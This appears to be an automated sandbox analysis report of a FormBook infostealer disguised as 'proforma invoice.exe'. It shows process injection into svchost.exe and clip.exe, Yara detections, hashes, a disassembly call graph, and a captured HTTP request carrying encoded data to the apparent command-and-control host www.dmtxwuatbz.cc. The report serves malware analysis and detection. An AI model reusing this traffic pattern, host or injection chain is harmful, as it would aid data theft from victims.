59 72 47 39 39 53 47 6a 61 55 39 47 47 58 6e 34 65 4c 62 48 42 50 45 67 68 66 48 34 49 42 37 72 6b 61 78 57 33 6d 72 57 5a 57 69 2f 59 46 31 63 52 75 37 59 2f 62 4a 63 4a 68 79 46 62 54 5a 44 42 6e 2b 55 30 51 69 42 66 2f 52 76 62 58 61 75 34 50 4e 73 78 [TRUNCATED]
                Data Ascii: AZOTcfex=tsf8FNiIpLuGJmkH3w8YIK8/XtoXXmweDndiO0ZrAI39wnI2KbDFyAcgWgRi8HpsX5daatObl6uPB9WE7Sxz2zCPgfza0n3Ng/iAvb2FMdoQiQiNaF0VJi2ueZDzXwqEFemQwXN/NkPwPuhHlS4bJlD7rgiNi5hmBDFCn+2OAORuy8sRlzB0/Kmvm4a0fmE6XEVH+AzvheIWDxzk3LrWTbJuwp83Z3NOYbw8r3XDqAExcsNnQmUvYrG99SGjaU9GGXn4eLbHBPEghfH4IB7rkaxW3mrWZWi/YF1cRu7Y/bJcJhyFbTZDBn+U0QiBf/RvbXau4PNsxAHJT0B4EMIa9ZfzW01DxfFzZ6r0RX4/5hH1St9W01BIjSe8bgTUd3nHUn+tuYmg/ucZcMybVRBp5KP/91y45L1OXuthnjqy9KKpZvrIyq7Ki2EORYo1CcwLn2tr6/pYFN/YwjTVmQ+aRuwyfFDZBSgbPfqZk80KIQxAkR8X02Q4aLGsWH2phSyydG6xPWhm+Zg64kVQwnupGX+q+qqPl+ThfD2QoL51miY/+57uidmWr8Qz/6e/WaozNJLbtZsHIArN7oxSsFUADytqgUGbC98qx5hYk7U2tNvkvG/cYzY53GRgrYM2sAGRB1IcgVqRoCAUqSlQKZvvsxOY9IqoJLUXfDEVPUsjrIgXvO3Piz70JWGdUmTUY2zj1qDR2ScpGfypKyhtqMf8Rx6uDFkSAMEDmZpy+/2VBX00JWjqic5fzxuAltDxhDfhrkwcKLl13ul5oWk4dqYk1bbGU8MYS3pGMU2RVucW6Q8D/RV0unDMzTUPCPJB/2+TSleJ+zgdcfk3utst5sWwAzT/bDbLvTmwawRUVjvxL+AaWkm5kpmCtwa+UWppQUGJwj/iibIPbj3WwaaMqkJiGay+ttLcx407CrZ90SfpvPIMoR1ImiA0ArbEbAgvKXIKCt9TVWIx4364ILTavhqsNMr4xpoEcMbcmVtnc1w5Kfz [TRUNCATED]


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                36192.168.2.449773172.67.210.102802412C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                TimestampBytes transferredDirectionData
                Aug 23, 2024 04:21:34.179558992 CEST511OUTGET /lfkn/?AZOTcfex=gu3cG9GLpLv0C38b+jYCf7UBXt4URUEycVQhN1coGdiN+H1mAKnEyno+ahRh93ZPWIJTdN+wkaWXNdzclzMT+BORo/i7gxKdhtDjyoGaGd8n3Q21UEESNSU=&bB7L5=DPt0-rQpMXpt HTTP/1.1
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-us
                Host: www.dmtxwuatbz.cc
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36


                Statistics

                CPU Usage

                Click to jump to process

                Memory Usage

                Click to jump to process

                High Level Behavior Distribution

                Click to dive into process behavior distribution

                Behavior

                Click to jump to process

                System Behavior

                General

                Target ID:0
                Start time:22:17:53
                Start date:22/08/2024
                Path:C:\Users\user\Desktop\proforma invoice.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\proforma invoice.exe"
                Imagebase:0xaa0000
                File size:1'248'256 bytes
                MD5 hash:77F8DA00F3632972D585FF7EFB0BEA8C
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Reputation:low
                Has exited:true

                General

                Target ID:1
                Start time:22:17:54
                Start date:22/08/2024
                Path:C:\Windows\SysWOW64\svchost.exe
                Wow64 process (32bit):true
                Commandline:"C:\Users\user\Desktop\proforma invoice.exe"
                Imagebase:0x150000
                File size:46'504 bytes
                MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                Has elevated privileges:true
                Has administrator privileges:true
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849019364.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849710409.0000000003550000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1849745711.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:true

                General

                Target ID:2
                Start time:22:18:06
                Start date:22/08/2024
                Path:C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe"
                Imagebase:0x560000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.4104123201.0000000002480000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                Reputation:high
                Has exited:false

                General

                Target ID:3
                Start time:22:18:07
                Start date:22/08/2024
                Path:C:\Windows\SysWOW64\clip.exe
                Wow64 process (32bit):true
                Commandline:"C:\Windows\SysWOW64\clip.exe"
                Imagebase:0x4a0000
                File size:24'576 bytes
                MD5 hash:E40CB198EBCD20CD16739F670D4D7B74
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Yara matches:
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4103118117.0000000003040000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4103939789.0000000004CD0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.4103994026.0000000004D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                Reputation:moderate
                Has exited:false

                General

                Target ID:7
                Start time:22:18:20
                Start date:22/08/2024
                Path:C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe
                Wow64 process (32bit):true
                Commandline:"C:\Program Files (x86)\bwDrWWgFvnzbDNMPoHAxTkiiBWcjmgMXYmLoJgWp\NpiZrjTdIDFUidJcY.exe"
                Imagebase:0x560000
                File size:140'800 bytes
                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:false

                General

                Target ID:8
                Start time:22:18:33
                Start date:22/08/2024
                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                Wow64 process (32bit):false
                Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                Imagebase:0x7ff6bf500000
                File size:676'768 bytes
                MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                Has elevated privileges:false
                Has administrator privileges:false
                Programmed in:C, C++ or other language
                Reputation:high
                Has exited:true

                Disassembly

                Reset < >

                  Execution Graph

                  Execution Coverage:3%
                  Dynamic/Decrypted Code Coverage:2%
                  Signature Coverage:2.9%
                  Total number of Nodes:1975
                  Total number of Limit Nodes:54
                  execution_graph 95654 21023b0 95668 2100000 95654->95668 95656 21024b5 95671 21022a0 95656->95671 95658 21024de CreateFileW 95660 2102530 95658->95660 95661 2102535 95658->95661 95661->95660 95662 210254c VirtualAlloc 95661->95662 95662->95660 95663 210256a ReadFile 95662->95663 95663->95660 95664 2102585 95663->95664 95665 21012a0 13 API calls 95664->95665 95667 21025b8 95665->95667 95666 21025db ExitProcess 95666->95660 95667->95666 95674 21034e0 GetPEB 95668->95674 95670 210068b 95670->95656 95672 21022a9 Sleep 95671->95672 95673 21022b7 95672->95673 95675 210350a 95674->95675 95675->95670 95676 aa1cad SystemParametersInfoW 95677 aa2de3 95678 aa2df0 __wsopen_s 95677->95678 95679 aa2e09 95678->95679 95680 ae2c2b ___scrt_fastfail 95678->95680 95693 aa3aa2 95679->95693 95682 ae2c47 GetOpenFileNameW 95680->95682 95684 ae2c96 95682->95684 95750 aa6b57 95684->95750 95689 ae2cab 95689->95689 95690 aa2e27 95721 aa44a8 95690->95721 95762 ae1f50 95693->95762 95696 aa3ae9 95768 aaa6c3 95696->95768 95697 aa3ace 95698 aa6b57 22 API calls 95697->95698 95700 aa3ada 95698->95700 95764 aa37a0 95700->95764 95703 aa2da5 95704 ae1f50 __wsopen_s 95703->95704 95705 aa2db2 GetLongPathNameW 95704->95705 95706 aa6b57 22 API calls 95705->95706 95707 aa2dda 95706->95707 95708 aa3598 95707->95708 95819 aaa961 95708->95819 95711 aa3aa2 23 API calls 95712 aa35b5 95711->95712 95713 ae32eb 95712->95713 95714 aa35c0 95712->95714 95719 ae330d 95713->95719 95836 abce60 41 API calls 95713->95836 95824 aa515f 95714->95824 95720 aa35df 95720->95690 95837 aa4ecb 95721->95837 95724 ae3833 95859 b12cf9 95724->95859 95725 aa4ecb 94 API calls 95727 aa44e1 95725->95727 95727->95724 95731 aa44e9 95727->95731 95728 ae3848 95729 ae384c 95728->95729 95730 ae3869 95728->95730 95886 aa4f39 95729->95886 95733 abfe0b 22 API calls 95730->95733 95734 ae3854 95731->95734 95735 aa44f5 95731->95735 95749 ae38ae 95733->95749 95892 b0da5a 82 API calls 95734->95892 95885 aa940c 136 API calls 2 library calls 95735->95885 95738 ae3862 95738->95730 95739 aa2e31 95740 aa4f39 68 API calls 95743 ae3a5f 95740->95743 95743->95740 95898 b0989b 82 API calls __wsopen_s 95743->95898 95746 aa9cb3 22 API calls 95746->95749 95749->95743 95749->95746 95893 b0967e 22 API calls __fread_nolock 95749->95893 95894 b095ad 42 API calls _wcslen 95749->95894 95895 b10b5a 22 API calls 95749->95895 95896 aaa4a1 22 API calls __fread_nolock 95749->95896 95897 aa3ff7 22 API calls 95749->95897 95751 aa6b67 _wcslen 95750->95751 95752 ae4ba1 95750->95752 95755 aa6b7d 95751->95755 95756 aa6ba2 95751->95756 95753 aa93b2 22 API calls 95752->95753 95754 ae4baa 95753->95754 95754->95754 96523 aa6f34 22 API calls 95755->96523 95758 abfddb 22 API calls 95756->95758 95760 aa6bae 95758->95760 95759 aa6b85 __fread_nolock 95759->95689 95761 abfe0b 22 API calls 95760->95761 95761->95759 95763 aa3aaf GetFullPathNameW 95762->95763 95763->95696 95763->95697 95765 aa37ae 95764->95765 95774 aa93b2 95765->95774 95767 aa2e12 95767->95703 95769 aaa6dd 95768->95769 95770 aaa6d0 95768->95770 95771 abfddb 22 API calls 95769->95771 95770->95700 95772 aaa6e7 95771->95772 95773 abfe0b 22 API calls 95772->95773 95773->95770 95775 aa93c0 95774->95775 95777 aa93c9 __fread_nolock 95774->95777 95775->95777 95778 aaaec9 95775->95778 95777->95767 95779 aaaed9 __fread_nolock 95778->95779 95780 aaaedc 95778->95780 95779->95777 95784 abfddb 95780->95784 95782 aaaee7 95794 abfe0b 95782->95794 95785 abfde0 95784->95785 95787 abfdfa 95785->95787 95790 abfdfc 95785->95790 95804 acea0c 95785->95804 95811 ac4ead 7 API calls 2 library calls 95785->95811 95787->95782 95789 ac066d 95813 ac32a4 RaiseException 95789->95813 95790->95789 95812 ac32a4 RaiseException 95790->95812 95793 ac068a 95793->95782 95796 abfddb 95794->95796 95795 acea0c ___std_exception_copy 21 API calls 95795->95796 95796->95795 95797 abfdfa 95796->95797 95800 abfdfc 95796->95800 95816 ac4ead 7 API calls 2 library calls 95796->95816 95797->95779 95799 ac066d 95818 ac32a4 RaiseException 95799->95818 95800->95799 95817 ac32a4 RaiseException 95800->95817 95803 ac068a 95803->95779 95809 ad3820 _free 95804->95809 95805 ad385e 95815 acf2d9 20 API calls _free 95805->95815 95806 ad3849 RtlAllocateHeap 95808 ad385c 95806->95808 95806->95809 95808->95785 95809->95805 95809->95806 95814 ac4ead 7 API calls 2 library calls 95809->95814 95811->95785 95812->95789 95813->95793 95814->95809 95815->95808 95816->95796 95817->95799 95818->95803 95820 abfe0b 22 API calls 95819->95820 95821 aaa976 95820->95821 95822 abfddb 22 API calls 95821->95822 95823 aa35aa 95822->95823 95823->95711 95825 aa516e 95824->95825 95829 aa518f __fread_nolock 95824->95829 95827 abfe0b 22 API calls 95825->95827 95826 abfddb 22 API calls 95828 aa35cc 95826->95828 95827->95829 95830 aa35f3 95828->95830 95829->95826 95831 aa3605 95830->95831 95835 aa3624 __fread_nolock 95830->95835 95833 abfe0b 22 API calls 95831->95833 95832 abfddb 22 API calls 95834 aa363b 95832->95834 95833->95835 95834->95720 95835->95832 95836->95713 95899 aa4e90 LoadLibraryA 95837->95899 95842 ae3ccf 95845 aa4f39 68 API calls 95842->95845 95843 aa4ef6 LoadLibraryExW 95907 aa4e59 LoadLibraryA 95843->95907 95847 ae3cd6 95845->95847 95848 aa4e59 3 API calls 95847->95848 95850 ae3cde 95848->95850 95929 aa50f5 95850->95929 95851 aa4f20 95851->95850 95852 aa4f2c 95851->95852 95854 aa4f39 68 API calls 95852->95854 95856 aa44cd 95854->95856 95856->95724 95856->95725 95858 ae3d05 95860 b12d15 95859->95860 95861 aa511f 64 API calls 95860->95861 95862 b12d29 95861->95862 96193 b12e66 95862->96193 95865 aa50f5 40 API calls 95866 b12d56 95865->95866 95867 aa50f5 40 API calls 95866->95867 95868 b12d66 95867->95868 95869 aa50f5 40 API calls 95868->95869 95870 b12d81 95869->95870 95871 aa50f5 40 API calls 95870->95871 95872 b12d9c 95871->95872 95873 aa511f 64 API calls 95872->95873 95874 b12db3 95873->95874 95875 acea0c ___std_exception_copy 21 API calls 95874->95875 95876 b12dba 95875->95876 95877 acea0c ___std_exception_copy 21 API calls 95876->95877 95878 b12dc4 95877->95878 95879 aa50f5 40 API calls 95878->95879 95880 b12dd8 95879->95880 95881 b128fe 27 API calls 95880->95881 95883 b12dee 95881->95883 95882 b12d3f 95882->95728 95883->95882 96199 b122ce 95883->96199 95885->95739 95887 aa4f43 95886->95887 95889 aa4f4a 95886->95889 95888 ace678 67 API calls 95887->95888 95888->95889 95890 aa4f6a FreeLibrary 95889->95890 95891 aa4f59 95889->95891 95890->95891 95891->95734 95892->95738 95893->95749 95894->95749 95895->95749 95896->95749 95897->95749 95898->95743 95900 aa4ea8 GetProcAddress 95899->95900 95901 aa4ec6 95899->95901 95902 aa4eb8 95900->95902 95904 ace5eb 95901->95904 95902->95901 95903 aa4ebf FreeLibrary 95902->95903 95903->95901 95937 ace52a 95904->95937 95906 aa4eea 95906->95842 95906->95843 95908 aa4e6e GetProcAddress 95907->95908 95909 aa4e8d 95907->95909 95910 aa4e7e 95908->95910 95912 aa4f80 95909->95912 95910->95909 95911 aa4e86 FreeLibrary 95910->95911 95911->95909 95913 abfe0b 22 API calls 95912->95913 95914 aa4f95 95913->95914 95998 aa5722 95914->95998 95916 aa4fa1 __fread_nolock 95917 ae3d1d 95916->95917 95918 aa50a5 95916->95918 95928 aa4fdc 95916->95928 96012 b1304d 74 API calls 95917->96012 96001 aa42a2 CreateStreamOnHGlobal 95918->96001 95921 ae3d22 95923 aa511f 64 API calls 95921->95923 95922 aa50f5 40 API calls 95922->95928 95924 ae3d45 95923->95924 95925 aa50f5 40 API calls 95924->95925 95927 aa506e ISource 95925->95927 95927->95851 95928->95921 95928->95922 95928->95927 96007 aa511f 95928->96007 95930 aa5107 95929->95930 95931 ae3d70 95929->95931 96034 ace8c4 95930->96034 95934 b128fe 96176 b1274e 95934->96176 95936 b12919 95936->95858 95940 ace536 ___BuildCatchObject 95937->95940 95938 ace544 95962 acf2d9 20 API calls _free 95938->95962 95940->95938 95942 ace574 95940->95942 95941 ace549 95963 ad27ec 26 API calls _strftime 95941->95963 95944 ace579 95942->95944 95945 ace586 95942->95945 95964 acf2d9 20 API calls _free 95944->95964 95954 ad8061 95945->95954 95948 ace58f 95949 ace595 95948->95949 95951 ace5a2 95948->95951 95965 acf2d9 20 API calls _free 95949->95965 95966 ace5d4 LeaveCriticalSection __fread_nolock 95951->95966 95953 ace554 __wsopen_s 95953->95906 95955 ad806d ___BuildCatchObject 95954->95955 95967 ad2f5e EnterCriticalSection 95955->95967 95957 ad807b 95968 ad80fb 95957->95968 95961 ad80ac __wsopen_s 95961->95948 95962->95941 95963->95953 95964->95953 95965->95953 95966->95953 95967->95957 95976 ad811e 95968->95976 95969 ad8088 95982 ad80b7 95969->95982 95970 ad8177 95987 ad4c7d 20 API calls _free 95970->95987 95972 ad8180 95988 ad29c8 95972->95988 95975 ad8189 95975->95969 95994 ad3405 11 API calls 2 library calls 95975->95994 95976->95969 95976->95970 95976->95976 95985 ac918d EnterCriticalSection 95976->95985 95986 ac91a1 LeaveCriticalSection 95976->95986 95978 ad81a8 95995 ac918d EnterCriticalSection 95978->95995 95981 ad81bb 95981->95969 95997 ad2fa6 LeaveCriticalSection 95982->95997 95984 ad80be 95984->95961 95985->95976 95986->95976 95987->95972 95989 ad29d3 RtlFreeHeap 95988->95989 95993 ad29fc _free 95988->95993 95990 ad29e8 95989->95990 95989->95993 95996 acf2d9 20 API calls _free 95990->95996 95992 ad29ee GetLastError 95992->95993 95993->95975 95994->95978 95995->95981 95996->95992 95997->95984 95999 abfddb 22 API calls 95998->95999 96000 aa5734 95999->96000 96000->95916 96002 aa42bc FindResourceExW 96001->96002 96006 aa42d9 96001->96006 96003 ae35ba LoadResource 96002->96003 96002->96006 96004 ae35cf SizeofResource 96003->96004 96003->96006 96005 ae35e3 LockResource 96004->96005 96004->96006 96005->96006 96006->95928 96008 aa512e 96007->96008 96009 ae3d90 96007->96009 96013 acece3 96008->96013 96012->95921 96016 aceaaa 96013->96016 96015 aa513c 96015->95928 96018 aceab6 ___BuildCatchObject 96016->96018 96017 aceac2 96029 acf2d9 20 API calls _free 96017->96029 96018->96017 96019 aceae8 96018->96019 96031 ac918d EnterCriticalSection 96019->96031 96021 aceac7 96030 ad27ec 26 API calls _strftime 96021->96030 96024 aceaf4 96032 acec0a 62 API calls 2 library calls 96024->96032 96026 aceb08 96033 aceb27 LeaveCriticalSection __fread_nolock 96026->96033 96028 acead2 __wsopen_s 96028->96015 96029->96021 96030->96028 96031->96024 96032->96026 96033->96028 96037 ace8e1 96034->96037 96036 aa5118 96036->95934 96038 ace8ed ___BuildCatchObject 96037->96038 96039 ace92d 96038->96039 96040 ace900 ___scrt_fastfail 96038->96040 96041 ace925 __wsopen_s 96038->96041 96050 ac918d EnterCriticalSection 96039->96050 96064 acf2d9 20 API calls _free 96040->96064 96041->96036 96043 ace937 96051 ace6f8 96043->96051 96046 ace91a 96065 ad27ec 26 API calls _strftime 96046->96065 96050->96043 96054 ace70a ___scrt_fastfail 96051->96054 96056 ace727 96051->96056 96052 ace717 96139 acf2d9 20 API calls _free 96052->96139 96054->96052 96054->96056 96061 ace76a __fread_nolock 96054->96061 96066 ace96c LeaveCriticalSection __fread_nolock 96056->96066 96057 ace886 ___scrt_fastfail 96142 acf2d9 20 API calls _free 96057->96142 96061->96056 96061->96057 96067 acd955 96061->96067 96074 ad8d45 96061->96074 96141 accf78 26 API calls 4 library calls 96061->96141 96062 ace71c 96140 ad27ec 26 API calls _strftime 96062->96140 96064->96046 96065->96041 96066->96041 96068 acd976 96067->96068 96069 acd961 96067->96069 96068->96061 96143 acf2d9 20 API calls _free 96069->96143 96071 acd966 96144 ad27ec 26 API calls _strftime 96071->96144 96073 acd971 96073->96061 96075 ad8d6f 96074->96075 96076 ad8d57 96074->96076 96077 ad90d9 96075->96077 96082 ad8db4 96075->96082 96154 acf2c6 20 API calls _free 96076->96154 96170 acf2c6 20 API calls _free 96077->96170 96079 ad8d5c 96155 acf2d9 20 API calls _free 96079->96155 96081 ad90de 96171 acf2d9 20 API calls _free 96081->96171 96085 ad8dbf 96082->96085 96088 ad8d64 96082->96088 96092 ad8def 96082->96092 96156 acf2c6 20 API calls _free 96085->96156 96086 ad8dcc 96172 ad27ec 26 API calls _strftime 96086->96172 96088->96061 96089 ad8dc4 96157 acf2d9 20 API calls _free 96089->96157 96093 ad8e08 96092->96093 96094 ad8e2e 96092->96094 96095 ad8e4a 96092->96095 96093->96094 96101 ad8e15 96093->96101 96158 acf2c6 20 API calls _free 96094->96158 96161 ad3820 21 API calls _free 96095->96161 96097 ad8e33 96159 acf2d9 20 API calls _free 96097->96159 96145 adf89b 96101->96145 96102 ad8e61 96105 ad29c8 _free 20 API calls 96102->96105 96103 ad8e3a 96160 ad27ec 26 API calls _strftime 96103->96160 96104 ad8fb3 96107 ad9029 96104->96107 96111 ad8fcc GetConsoleMode 96104->96111 96108 ad8e6a 96105->96108 96110 ad902d ReadFile 96107->96110 96109 ad29c8 _free 20 API calls 96108->96109 96112 ad8e71 96109->96112 96113 ad9047 96110->96113 96114 ad90a1 GetLastError 96110->96114 96111->96107 96115 ad8fdd 96111->96115 96116 ad8e7b 96112->96116 96117 ad8e96 96112->96117 96113->96114 96120 ad901e 96113->96120 96118 ad90ae 96114->96118 96119 ad9005 96114->96119 96115->96110 96121 ad8fe3 ReadConsoleW 96115->96121 96162 acf2d9 20 API calls _free 96116->96162 96164 ad9424 28 API calls __fread_nolock 96117->96164 96168 acf2d9 20 API calls _free 96118->96168 96137 ad8e45 __fread_nolock 96119->96137 96165 acf2a3 20 API calls 2 library calls 96119->96165 96132 ad906c 96120->96132 96133 ad9083 96120->96133 96120->96137 96121->96120 96126 ad8fff GetLastError 96121->96126 96122 ad29c8 _free 20 API calls 96122->96088 96126->96119 96127 ad8e80 96163 acf2c6 20 API calls _free 96127->96163 96128 ad90b3 96169 acf2c6 20 API calls _free 96128->96169 96166 ad8a61 31 API calls 3 library calls 96132->96166 96135 ad909a 96133->96135 96133->96137 96167 ad88a1 29 API calls __fread_nolock 96135->96167 96137->96122 96138 ad909f 96138->96137 96139->96062 96140->96056 96141->96061 96142->96062 96143->96071 96144->96073 96146 adf8a8 96145->96146 96148 adf8b5 96145->96148 96173 acf2d9 20 API calls _free 96146->96173 96150 adf8c1 96148->96150 96174 acf2d9 20 API calls _free 96148->96174 96149 adf8ad 96149->96104 96150->96104 96152 adf8e2 96175 ad27ec 26 API calls _strftime 96152->96175 96154->96079 96155->96088 96156->96089 96157->96086 96158->96097 96159->96103 96160->96137 96161->96102 96162->96127 96163->96137 96164->96101 96165->96137 96166->96137 96167->96138 96168->96128 96169->96137 96170->96081 96171->96086 96172->96088 96173->96149 96174->96152 96175->96149 96179 ace4e8 96176->96179 96178 b1275d 96178->95936 96182 ace469 96179->96182 96181 ace505 96181->96178 96183 ace48c 96182->96183 96184 ace478 96182->96184 96189 ace488 __alldvrm 96183->96189 96192 ad333f 11 API calls 2 library calls 96183->96192 96190 acf2d9 20 API calls _free 96184->96190 96187 ace47d 96191 ad27ec 26 API calls _strftime 96187->96191 96189->96181 96190->96187 96191->96189 96192->96189 96197 b12e7a 96193->96197 96194 aa50f5 40 API calls 96194->96197 96195 b12d3b 96195->95865 96195->95882 96196 b128fe 27 API calls 96196->96197 96197->96194 96197->96195 96197->96196 96198 aa511f 64 API calls 96197->96198 96198->96197 96200 b122d9 96199->96200 96201 b122e7 96199->96201 96202 ace5eb 29 API calls 96200->96202 96203 b1232c 96201->96203 96204 ace5eb 29 API calls 96201->96204 96227 b122f0 96201->96227 96202->96201 96228 b12557 96203->96228 96206 b12311 96204->96206 96206->96203 96208 b1231a 96206->96208 96207 b12370 96209 b12395 96207->96209 96210 b12374 96207->96210 96211 ace678 67 API calls 96208->96211 96208->96227 96232 b12171 96209->96232 96213 ace678 67 API calls 96210->96213 96214 b12381 96210->96214 96211->96227 96213->96214 96218 ace678 67 API calls 96214->96218 96214->96227 96215 b1239d 96216 b123c3 96215->96216 96217 b123a3 96215->96217 96239 b123f3 96216->96239 96219 b123b0 96217->96219 96221 ace678 67 API calls 96217->96221 96218->96227 96222 ace678 67 API calls 96219->96222 96219->96227 96221->96219 96222->96227 96223 b123ca 96224 b123de 96223->96224 96247 ace678 96223->96247 96226 ace678 67 API calls 96224->96226 96224->96227 96226->96227 96227->95882 96229 b12565 __fread_nolock 96228->96229 96230 b1257c 96228->96230 96229->96207 96231 ace8c4 __fread_nolock 40 API calls 96230->96231 96231->96229 96233 acea0c ___std_exception_copy 21 API calls 96232->96233 96234 b1217f 96233->96234 96235 acea0c ___std_exception_copy 21 API calls 96234->96235 96236 b12190 96235->96236 96237 acea0c ___std_exception_copy 21 API calls 96236->96237 96238 b1219c 96237->96238 96238->96215 96246 b12408 96239->96246 96240 b124c0 96264 b12724 96240->96264 96241 b121cc 40 API calls 96241->96246 96243 b124c7 96243->96223 96246->96240 96246->96241 96246->96243 96260 b12606 96246->96260 96268 b12269 40 API calls 96246->96268 96248 ace684 ___BuildCatchObject 96247->96248 96249 ace6aa 96248->96249 96250 ace695 96248->96250 96259 ace6a5 __wsopen_s 96249->96259 96304 ac918d EnterCriticalSection 96249->96304 96321 acf2d9 20 API calls _free 96250->96321 96252 ace69a 96322 ad27ec 26 API calls _strftime 96252->96322 96255 ace6c6 96305 ace602 96255->96305 96257 ace6d1 96323 ace6ee LeaveCriticalSection __fread_nolock 96257->96323 96259->96224 96261 b12617 96260->96261 96263 b1261d 96260->96263 96261->96263 96269 b126d7 96261->96269 96263->96246 96265 b12731 96264->96265 96266 b12742 96264->96266 96267 acdbb3 65 API calls 96265->96267 96266->96243 96267->96266 96268->96246 96270 b12703 96269->96270 96271 b12714 96269->96271 96273 acdbb3 96270->96273 96271->96261 96274 acdbdd 96273->96274 96275 acdbc1 96273->96275 96274->96271 96275->96274 96276 acdbcd 96275->96276 96277 acdbe3 96275->96277 96285 acf2d9 20 API calls _free 96276->96285 96282 acd9cc 96277->96282 96280 acdbd2 96286 ad27ec 26 API calls _strftime 96280->96286 96287 acd97b 96282->96287 96284 acd9f0 96284->96274 96285->96280 96286->96274 96288 acd987 ___BuildCatchObject 96287->96288 96295 ac918d EnterCriticalSection 96288->96295 96290 acd995 96296 acd9f4 96290->96296 96294 acd9b3 __wsopen_s 96294->96284 96295->96290 96297 ad49a1 27 API calls 96296->96297 96298 acda09 96297->96298 96299 acda3a 62 API calls 96298->96299 96300 acda24 96299->96300 96301 ad4a56 62 API calls 96300->96301 96302 acd9a2 96301->96302 96303 acd9c0 LeaveCriticalSection __fread_nolock 96302->96303 96303->96294 96304->96255 96306 ace60f 96305->96306 96307 ace624 96305->96307 96349 acf2d9 20 API calls _free 96306->96349 96319 ace61f 96307->96319 96324 acdc0b 96307->96324 96310 ace614 96350 ad27ec 26 API calls _strftime 96310->96350 96315 acd955 __fread_nolock 26 API calls 96316 ace646 96315->96316 96334 ad862f 96316->96334 96319->96257 96320 ad29c8 _free 20 API calls 96320->96319 96321->96252 96322->96259 96323->96259 96325 acdc23 96324->96325 96329 acdc1f 96324->96329 96326 acd955 __fread_nolock 26 API calls 96325->96326 96325->96329 96327 acdc43 96326->96327 96351 ad59be 96327->96351 96330 ad4d7a 96329->96330 96331 ace640 96330->96331 96332 ad4d90 96330->96332 96331->96315 96332->96331 96333 ad29c8 _free 20 API calls 96332->96333 96333->96331 96335 ad863e 96334->96335 96336 ad8653 96334->96336 96474 acf2c6 20 API calls _free 96335->96474 96337 ad868e 96336->96337 96342 ad867a 96336->96342 96476 acf2c6 20 API calls _free 96337->96476 96339 ad8643 96475 acf2d9 20 API calls _free 96339->96475 96471 ad8607 96342->96471 96343 ad8693 96477 acf2d9 20 API calls _free 96343->96477 96346 ace64c 96346->96319 96346->96320 96347 ad869b 96478 ad27ec 26 API calls _strftime 96347->96478 96349->96310 96350->96319 96352 ad59ca ___BuildCatchObject 96351->96352 96353 ad59ea 96352->96353 96354 ad59d2 96352->96354 96356 ad5a88 96353->96356 96361 ad5a1f 96353->96361 96430 acf2c6 20 API calls 